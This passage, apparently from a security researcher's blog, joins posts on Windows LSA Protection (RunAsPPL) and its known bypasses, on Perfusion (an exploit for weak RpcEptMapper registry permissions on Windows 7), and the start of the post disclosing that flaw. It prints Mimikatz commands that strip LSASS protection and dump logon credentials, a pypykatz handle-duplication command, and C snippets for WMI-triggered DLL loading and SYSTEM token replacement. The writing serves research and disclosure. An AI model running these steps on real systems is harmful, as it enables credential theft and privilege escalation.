  2. open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
  3. add the DWORD value RunAsPPL and set it to 1;
  4. reboot.

That’s it! You are done!

Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions.

  • Do you use any third-party authentication module?
  • Do you use UEFI and/or Secure Boot?

Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that they meet the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such module would be blocked if RunAsPPL were enabled.

Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection.

You Shall Not Pass!

By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar.

This screenshot shows several important things:

  • the current user is a member of the default Administrators group;
  • the current user has SeDebugPrivilege (although it is currently disabled);
  • the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege;
  • the command sekurlsa::logonpasswords failed with the error code 0x00000005.

So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in.

HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);

if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499).

Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then, it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means “Access is denied”. This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags.

All the things I have explained so far can be considered common knowledge as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts.

Bypassing RunAsPPL with Currently Known Techniques

At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short.

Technique 1 – The Revenge of the Kiwi

In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it.

To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Once you are done, you can even “restore” the protection using the same command, but without the /remove argument and finally unload the driver with !-.

mimikatz # !processprotect /process:lsass.exe
mimikatz # !-

There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was as you will see in the next part but it could also have some undesired side effects.

Technique 2 – Bring You Own Driver

The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in-memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do.

If you don’t want to go through the official signing process, there is a clever trick you can use. This trick consists in loading an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded it can be exploited from User-land to load an unsigned driver for example. This technique is implemented in gdrv-loader and PPLKiller for instance.

Technique 3 – Python & Katz

The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such technique is still very dangerous, make one mistake and you trigger a BSOD.

More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking access to LSASS process.

If you want to access LSASS’ memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: simply do not invoke OpenProcess. But how do you get the initial handle then? The answer came from the following observation. Sometimes, other processes, such as in the case of Antivirus software, already have an opened handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you could copy this handle into you own process and then use it to access LSASS.

It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL because some unprotected processes may have obtained a handle on the LSASS process by another mean, using a driver for instance. In which case you can use pypykatz with the following command.

pypykatz live lsa --method handledup

On some occasions, this method worked perfectly fine for me but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine.

What are PPL Processes?

Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first so I can explain them into more detail here.

A Long Time Ago in a Galaxy Far, Far Away…

OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning.

First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008 and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the “Protected Processes” part of Windows Internals).

In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly-sensitive processes.

A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. PPL is actually an extension of the previous Protected Process model and adds the concept of “Protection level”, which basically means that some PP(L) processes can be more protected than others.

Protection Levels

The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;                  // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

As you probably guessed, a process’ protection level is defined by a combination of these two values. The below table lists the most common combinations.

Protection level Value Signer Type
PS_PROTECTED_SYSTEM 0x72 WinSystem (7) Protected (2)
PS_PROTECTED_WINTCB 0x62 WinTcb (6) Protected (2)
PS_PROTECTED_WINDOWS 0x52 Windows (5) Protected (2)
PS_PROTECTED_AUTHENTICODE 0x12 Authenticode (1) Protected (2)
PS_PROTECTED_WINTCB_LIGHT 0x61 WinTcb (6) Protected Light (1)
PS_PROTECTED_WINDOWS_LIGHT 0x51 Windows (5) Protected Light (1)
PS_PROTECTED_LSA_LIGHT 0x41 Lsa (4) Protected Light (1)
PS_PROTECTED_ANTIMALWARE_LIGHT 0x31 Antimalware (3) Protected Light (1)
PS_PROTECTED_AUTHENTICODE_LIGHT 0x11 Authenticode (1) Protected Light (1)

Signer Types

In the early days of Protected Processes, the protection level was binary, either a process was protected or it was not. We saw that this changed when PPL were introduced with Windows NT 6.3. Both PP and PPL now have a protection level which is determined by a signer level as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined.

The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file’s digital certificate: Enhanced Key Usage (EKU).

On this screenshot, you can see two examples, wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level.

Protection Precedence

The last key aspect that needs to be discussed is the Protection Precedence. In the “Protected Process Light (PPL) part of Windows Internals 7th Edition Part 1, you can read the following:

When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa.

In other words:

  • a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal;
  • a PPL can open another PPL with full access, as long as its signer level is greater or equal;
  • a PPL cannot open a PP with full access, regardless of its signer level.

Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low privileged user, you will not be able to magically access other users’ processes. It’s an additional protection.

To illustrate this, I picked 3 easily identifiable processes / image files:

  • wininit.exe – Session 0 initilization
  • lsass.exe – LSASS process
  • MsMpEng.exe – Windows Defender service

Pr. Process Type Signer Level
1 wininit.exe Protected Light WinTcb PsProtectedSignerWinTcb-Light
2 lsass.exe Protected Light Lsa PsProtectedSignerLsa-Light
3 MsMpEng.exe Protected Light Antimalware PsProtectedSignerAntimalware-Light

These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege so user rights are not a concern in this example. This all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe can access none of the two other processes because it has the lowest level.

Conclusion

In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw.

In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”), would still be able to open it with full access.

There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks.

Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned!

Update 2021-04-25 – The second part is now available here: Bypassing LSA Protection in Userland

Links & Resources

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share.

In the Previous Episode…

Before we begin, here is a brief summary of my last blog post. On Windows 7 / Server 2008 R2, two service registry keys are configured with weak permissions: RpcEptMapper and DnsCache. Basically, these permissions provide a regular user with the ability to create subkeys. This issue is pretty simple to leverage. One just has to create a Performance key and populate it with a few values, among which is the absolute path of a Performance DLL. In order for this DLL to be loaded by a privileged user, one just has to query the Performnance counters of the machine (by invoking Get-WmiObject Win32_Perf in PowerShell for example). When doing so, the WMI service should load the DLL as NT AUTHORITY\SYSTEM and execute three predefined functions that must be exported by the library (and that are also configured in the Performance registry key).

WMI and the Performance Counters

The documentation states that “Windows Performance Counters provide a high-level abstraction layer that provides a consistent interface for collecting various kinds of system data such as CPU, memory, and disk usage. Further, in the About section, you can read that there are four main ways to use Performance counters, and one of them is through the WMI Performance Counter Classes. This is more or less how I found out that you could query these counters with Get-WmiObject Win32_Perf in PowerShell. This type of interaction is potentially very interesting because it involves a very common type of IPC (Inter-Process Communication) on Windows which is RPC (Remote Procedure Call), or more precisely DCOM (Distributed Component Object Model) in this case (DCOM works on top of RPC). Such mechanism is especially required when a low-privileged process needs to interact with a more privileged one, such as the WMI service in our case.

This explains why, as a regular user, we were able to force the WMI service to load our DLL. However, this type of trigger is a double-edged sword. Indeed, when I initially worked on the Proof-of-Concept, I noticed that, on rare occasions, the DLL would not be loaded as NT AUTHORITY\SYSTEM and the exploit would thus fail. Why is that? The answer is: “impersonation”.

When interacting with another process, especially if it is a privileged service, impersonation is very common. To understand why it is so important, you have to keep in mind that, whenever you invoke a Remote Procedure Call, you literally ask another process to execute some code and, often, using parameters that are under your control. If you are able to force a service to do things such as move an arbitrary file to an arbitrary location as NT AUTHORITY\SYSTEM for example, this can have nasty consequences. To solve this problem, the Windows API provides almost as many impersonation functions as there are IPC mechanisms. For instance, you can invoke ImpersonateNamedPipeClient as a named pipe server or RpcImpersonateClient as an RPC server.

In the case of the Performance counters, when you instantiate the remote class Win32_Perf, I observed that the WMI service sometimes creates a dedicated wmiprvse.exe process that runs as NT AUTHORITY\LOCAL SERVICE. In this case, it always impersonates the client, as illustrated on the screenshot below.

Honestly, I haven’t spent any time trying to figure out why the service would sometimes load the DLL as LOCAL SERVICE, or as SYSTEM on other occasions. What I observed though is that, if you wait long enough and then try again, the DLL would be loaded as SYSTEM. This was enough for me because I didn’t want to spend too much time on this as I have other (more interesting) projects I want to work on. Therefore, in the rest of this article, we will just consider that we have the ability to load our DLL in the context of NT AUTHORITY\SYSTEM.

Exploit Development

The idea is to build a standalone exploit. In other words, as a pentester, I want to be able to drop a simple executable on a vulnerable machine and just execute it to get a SYSTEM shell, without having to configure the registry manually or compile a DLL every time.

Now, in order to define a proper strategy to get there, we need to list the starting conditions. First, we know that a machine reboot is not required. We already know that the DLL loading can be triggered through the instantiation of a WMI class. This is very easy to do with a high-level script engine such as PowerShell but doing the same thing in C/C++ will probably require a bit of work. Then, we know that, although we modify the configuration of the RpcEptMapper (or DnsCache) service, the DLL is actually loaded by the WMI service. We will see why this is important in a moment. Last but not least, we want to be able to get a SYSTEM shell in our console but the DLL is actually loaded by a service in a totally different session, so we will have to find a way to solve this problem.

Instantiate a WMI Class in C/C++

I really want to emphasize that, when you use a command such as Get-WmiObject Win32_Perf in PowerShell, there is a loooooot of stuff going on under the hood. These cmdlets are extremely powerful and make the life of system administrators and developers a lot easier. Unless you have at least tried to develop a client program for a DCOM interface in C/C++, you cannot really realize that. Fortunately, the documentation provided by Microsoft is pretty good and contains several detailed examples. They even provide a complete code snippet. In order to help you realize what I’ve just said, you should just know that this sample code is written in more than 250 lines of C/C++ and that the only thing it does is query a single counter, whereas Get-WmiObject Win32_Perf actually collects all the available counters. To me, this is really mind-blowing!

In the end, here is a completely stripped-down version of the code I eventually came up with to trigger the DLL loading within the WMI service.

CoInitializeEx(NULL, COINIT_MULTITHREADED);
CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_NONE, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, 0);
CoCreateInstance(CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)&pWbemLocator);
bstrNameSpace = SysAllocString(L"\\\\.\\root\\cimv2");
pWbemLocator->ConnectServer(bstrNameSpace, NULL, NULL, NULL, 0L, NULL, NULL, &pNameSpace);
CoCreateInstance(CLSID_WbemRefresher, NULL, CLSCTX_INPROC_SERVER, IID_IWbemRefresher, (void**)&pRefresher);
pRefresher->QueryInterface(IID_IWbemConfigureRefresher, (void**)&pConfig);
pConfig->AddEnum(pNameSpace, L"Win32_Perf", 0, NULL, &pEnum, &lID);
pRefresher->Refresh(0L);
pEnum->GetObjects(0L, dwNumObjects, apEnumAccess, &dwNumReturned);

The first function calls are pretty standard when working with DCOM. CoInitializeEx and CoInitializeSecurity are necessary to set up a basic communication channel between the client and the DCOM server. Then the first CoCreateInstance gives you an initial pointer to the IWbemServices interface for WMI. This allows you to access the root/cimv2 namespace once you have invoked ConnectServer. If you have ever used WMI queries in PowerShell, this should sound familiar. After that, you can access the class you want. Here I picked Win32_Perf because I knew it already worked with Get-WmiObject Win32_Perf. Finally a first call to GetObjects is required to get the number of objects that will be returned by the server. This way, the client can allocate enough memory and then call GetObjects a second time to get the actual data. Yeah, we are doing quite low-level stuff in comparison to PowerShell so you have to do this kind of things yourself… Anyway, in our case, this second call is not required as the first one is enough to trigger the collection of the Performance counters’ data.

Communicate with the WMI Service (or not?)

Here comes the interesting part. This part is the true reason why I wanted to write about this particular exploit in the first place. Indeed, I used quite an unconventional trick to have a SYSTEM shell spawn in the same console.

When dealing with a privilege escalation exploit that involves DLL loading (in a privileged service), a very common problem arises, especially when you want to develop a standalone tool. From your exploit tool, how do you interact with the code that is executed within your DLL? Let’s say you want to spawn a SYSTEM command prompt. You can invoke CreateProcess for example but then… what? Well, good job, the command prompt has just spawned on the service’s Desktop (in session 0) and you have no way to interact with it. To solve this problem, exploit writers usually use IPC mechanisms to create a communication channel so that the client (i.e. the exploit) can interact with the server (i.e. the exploited service). For example, you can set up some named pipes, a main one to accept client requests and then three other ones so that the client can access the stdin/stdout/stderr I/O of the created process. This is actually how PsExec works by the way. The same thing can also be achieved using a TCP socket. From the exploited service (i.e. within the code of the DLL), you could bind to a local TCP port, create a process and then redirect its input/output to the socket. This way, a client just needs to connect to the local TCP port to interact with the created process. This is how bind shells work.

These are well-known techniques that I also used in previous exploits. This time though, I wanted to opt for something a bit different. And by “a bit different”, I actually mean “completely different” because I did not use any IPC mechanism at all! Or at least, not a conventional one…

In our scenario, as opposed to a typical DLL hijacking for example, we start with a significant advantage that I intentionally omitted to mention: we control the full path, and most importantly the name of the DLL that will be loaded by the privileged service. I insist on this detail because the name of the DLL itself can convey all the information we need, without having to rely on a standard IPC mechanism.

Here is the plan in a few basic steps:

  1. Create a process in the background, in a suspended state.
  2. Write the embedded DLL payload to an arbitrary location, such as the user’s Temp folder.
  3. Create the Performance subkey and populate it with the appropriate values, especially the path of the DLL file that was previously created.
  4. Instantiate the WMI class Win32_Perf to trigger the DLL loading.

At step 1, the idea is to spawn a cmd.exe Process for example. As a result of the CreateProcess call, you will get the handle and the ID that are associated to the created Process and its main Thread. At step 2, when writing the payload DLL to the disk, we will include the ID of the Process that has just been created in the name of the file (e.g.: performance_1234.dll). You’ll see why in a moment. Step 3 and 4 were already mentioned in the introduction and are rather self-explanatory.

From the service’s standpoint, the DLL will first be loaded and DllMain will be invoked. Then, it will call OpenPerfData, which is one of the three functions that are exported by our library. As a side note, this is particularly convenient because we can write our code outside of the loader lock. The OpenPerfData function is where our payload will be executed. From there, we can first retrieve the name of the module (i.e. the name of the DLL file). Since the filename contains the PID of the Process we initially created as a regular user, we will be able to perform some “adjustments” on it, in the context of NT AUTHORITY\SYSTEM.

What I mean by “adjustments” is that we will actually replace its primary Token

Replace a Process Level Token

As a reminder, on Windows, a Token represents the security context of a user in a Process or Thread. It holds some information such as the groups a user belongs to or the privileges it has. They can be of two types: Primary or Impersonation. A Primary Token is associated to a Process whereas an Impersonation Token is associated to a Thread. Thread level (i.e. Impersonation) Tokens are relevant when a service wants to impersonate a client for example. Process level Tokens, on the other hand, are not really meant to be replaced at runtime.

Before working on this exploit, my assumption was that, unlike Thread level Tokens, Process level Tokens were immutable. As soon as a Process is created, I thought that you could not change its Primary Token, unless you were able to execute some arbitrary code in the Kernel. But I was wrong! Though, in my defense, I have to say that this involves some undocumented stuff.

The exploit steps I mentioned previously should make a little more sense now. From within the DLL (i.e. in the context of the privileged service), here are the steps we need to follow:

  1. Create a copy of the current Process’ Token (by calling DuplicateTokenEx).
  2. Open the the client’s Process. We can do that because we know its PID.
  3. Replace the client’s Process Token with the one we created at step 1.

The first step is very simple and self-explanatory. Steps 2 and 3 are self-explanatory as well but they actually require very specific privileges. Fortunately for us, it seems that the Token of the WMI service’s Process has all the privileges that exist on Windows, as illustrated on the screenshot below. Anyway, as long as we execute arbitrary code in the context of NT AUTHORITY\SYSTEM we can recover any privilege we want.

Below is a stripped-down version of the code that allows us to replace the Token of the Process that was created by the client with the copy of the current SYSTEM Token. It should be noted that, for this operation to succeed, the target Process must be in a SUSPENDED state.

PROCESS_ACCESS_TOKEN tokenInfo = { 0 };
tokenInfo.Token = hSystemTokenDup;
tokenInfo.Thread = NULL;

NtSetInformationProcess(
    hClientProcess,                 // Client's Process handle (PROCESS_ALL_ACCESS)
    ProcessInformationClassMax,     // Type of information to set
    &tokenInfo,                     // A reference to a structure containing the SYSTEM Token handle
    sizeof(tokenInfo)               // Size of the structure
);

As briefly mentioned previously, the NtSetInformationProcess function is not documented. It is part of the Native API so it is not directly accessible within the Windows SDK. You have to define its prototype in your own header file and then import it manually from the NTDLL at runtime. Anyway, this function is very powerful as it allows you to change the Token of a Process, even after it has been created. Pretty cool, isn’t it?

Once this is done, the client can simply resume the main Thread and that’s it! You get a nice SYSTEM shell in your console.

Conclusion

There are some implementation steps I did not mention in this post because the main point was to discuss how we could develop an exploit that does not require IPC communications. For example, I used a Global Event in order to synchronize the main exploit with the payload that is executed within the DLL. But, the exploit would have worked without it as well.

Then, when I say that I did not use Inter-Process Communications, one could argue that it is not completely true because I did use the name of the DLL to convey some information in the end. But, it turns out that it is not strictly required either. You could still do the exact same thing without using this trick. For example, you could implement something very similar to a “egg hunter”. You could create an egg (e.g.: a predefined string) in the memory of your process and then, from within the DLL, you could open every single Process and search their memory to find this egg. From there, you can get the ID of the main Process and thus determine the ID of its child Process as well. It was just way more convenient to communicate the PID directly through the filename here.

With this little exploit development process, I learned a few things that I wanted to share. So, as always, I hope you have learned something too by reading this. That’s it for today!

Links & Resources

Windows RpcEptMapper Service Insecure Registry Permissions EoP

If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or Windows Server 2008 R2, you probably noticed a weird recurring result and perhaps thought that it was a false positive just as I did. Or perhaps you’re reading this and you have no idea what I am talking about. Anyway, the only thing you should know is that this script actually did spot a Windows 0-day privilege escalation vulnerability. Here is the story behind this finding…

A Bit of Context…

At the beginning of this year, I started working on a privilege escalation enumeration script: PrivescCheck. The idea was to build on the work that had already been accomplished with the famous PowerUp tool and implement a few more checks that I found relevant. With this script, I simply wanted to be able to quickly enumerate potential vulnerabilities caused by system misconfigurations but, it actually yielded some unexpected results. Indeed, it enabled me to find a 0-day vulnerability in Windows 7 / Server 2008R2!

Given a fully patched Windows machine, one of the main security issues that can lead to local privilege escalation is service misconfiguration. If a normal user is able to modify an existing service then he/she can execute arbitrary code in the context of LOCAL/NETWORK SERVICE or even LOCAL SYSTEM. Here are the most common vulnerabilities. There is nothing new so you can skip this part if you are already familiar with these concepts.

  • Service Control Manager (SCM) - Low-privileged users can be granted specific permissions on a service through the SCM. For example, a normal user can start the Windows Update service with the command sc.exe start wuauserv thanks to the SERVICE_START permission. This is a very common scenario. However, if this same user had SERVICE_CHANGE_CONFIG, he/she would be able to alter the behavior of the that service and make it run an arbitrary executable.

  • Binary permissions - A typical Windows service usually has a command line associated with it. If you can modify the corresponding executable (or if you have write permissions in the parent folder) then you can basically execute whatever you want in the security context of that service.

  • Unquoted paths - This issue is related to the way Windows parses command lines. Let’s consider a fictitious service with the following command line: C:\Applications\Custom Service\service.exe /v. This command line is ambiguous so Windows would first try to execute C:\Applications\Custom.exe with Service\service.exe as the first argument (and /v as the second argument). If a normal user had write permissions in C:\Applications then he/she could hijack the service by copying a malicious executable to C:\Applications\Custom.exe. That’s why paths should always be surrounded by quotes, especially when they contain spaces: "C:\Applications\Custom Service\service.exe" /v

  • Phantom DLL hijacking (and writable %PATH% folders) - Even on a default installation of Windows, some built-in services try to load DLLs that don’t exist. That’s not a vulnerability per se but if one of the folders that are listed in the %PATH% environment variable is writable by a normal user then these services can be hijacked.

Each one of these potential security issues already had a corresponding check in PowerUp but there is another case where misconfiguration may arise: the registry. Usually, when you create a service, you do so by invoking the Service Control Manager using the built-in command sc.exe as an administrator. This will create a subkey with the name of your service in HKLM\SYSTEM\CurrentControlSet\Services and all the settings (command line, user, etc.) will be saved in this subkey. So, if these settings are managed by the SCM, they should be secure by default. At least that’s what I thought…

Checking Registry Permissions

One of the core functions of PowerUp is Get-ModifiablePath. The basic idea behind this function is to provide a generic way to check whether the current user can modify a file or a folder in any way (e.g.: AppendData/AddSubdirectory). It does so by parsing the ACL of the target object and then comparing it to the permissions that are given to the current user account through all the groups it belongs to. Although this principle was originally implemented for files and folders, registry keys are securable objects too. Therefore, it’s possible to implement a similar function to check if the current user has any write permissions on a registry key. That’s exactly what I did and I thus added a new core function: Get-ModifiableRegistryPath.

Then, implementing a check for modifiable registry keys corresponding to Windows services is as easy as calling the Get-ChildItem PowerShell command on the path Registry::HKLM\SYSTEM\CurrentControlSet\Services. The result can simply be piped to the new Get-ModifiableRegistryPath command, and that’s all.

When I need to implement a new check, I use a Windows 10 machine, and I also use the same machine for the initial testing to see if everything is working as expected. When the code is stable, I extend the tests to a few other Windows VMs to make sure that it’s still PowerShell v2 compatible and that it can still run on older systems. The operating systems I use the most for that purpose are Windows 7, Windows 2008 R2 and Windows Server 2012 R2.

When I ran the updated script on a default installation of Windows 10, it didn’t return anything, which was the result I expected. But then, I ran it on Windows 7 and I saw this:

Since I didn’t expect the script to yield any result, I frst thought that these were false positives and that I had messed up at some point in the implementation. But, before getting back to the code, I did take a closer look at these results…

A False Positive?

According to the output of the script, the current user has some write permissions on two registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
  • HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

Let’s manually check the permissions of the RpcEptMapper service using the regedit GUI. One thing I really like about the Advanced Security Settings window is the Effective Permissions tab. You can pick any user or group name and immediately see the effective permissions that are granted to this principal without the need to inspect all the ACEs separately. The following screenshot shows the result for the low privileged lab-user account.

Most permissions are standard (e.g.: Query Value) but one in particular stands out: Create Subkey. The generic name corresponding to this permission is AppendData/AddSubdirectory, which is exactly what was reported by the script:

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {ReadControl, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : BUILTIN\Users
Permissions       : {WriteExtendedAttributes, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

What does this mean exactly? It means that we cannot just modify the ImagePath value for example. To do so, we would need the WriteData/AddFile permission. Instead, we can only create a new subkey.

Does it mean that it was indeed a false positive? Surely not. Let the fun begin!

RTFM

At this point, we know that we can create arbirary subkeys under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper but we cannot modify existing subkeys and values. These already existing subkeys are Parameters and Security, which are quite common for Windows services.

Therefore, the first question that came to mind was: is there any other predefined subkey - such as Parameters and Security- that we could leverage to effectively modify the configuration of the service and alter its behavior in any way?

To answer this question, my initial plan was to enumerate all existing keys and try to identify a pattern. The idea was to see which subkeys are meaningful for a service’s configuration. I started to think about how I could implement that in PowerShell and then sort the result. Though, before doing so, I wondered if this registry structure was already documented. So, I googled something like windows service configuration registry site:microsoft.com and here is the very first result that came out.

Looks promising, doesn’t it? At first glance, the documentation did not seem to be exhaustive and complete. Considering the title, I expected to see some sort of tree structure detailing all the subkeys and values defining a service’s configuration but it was clearly not there.

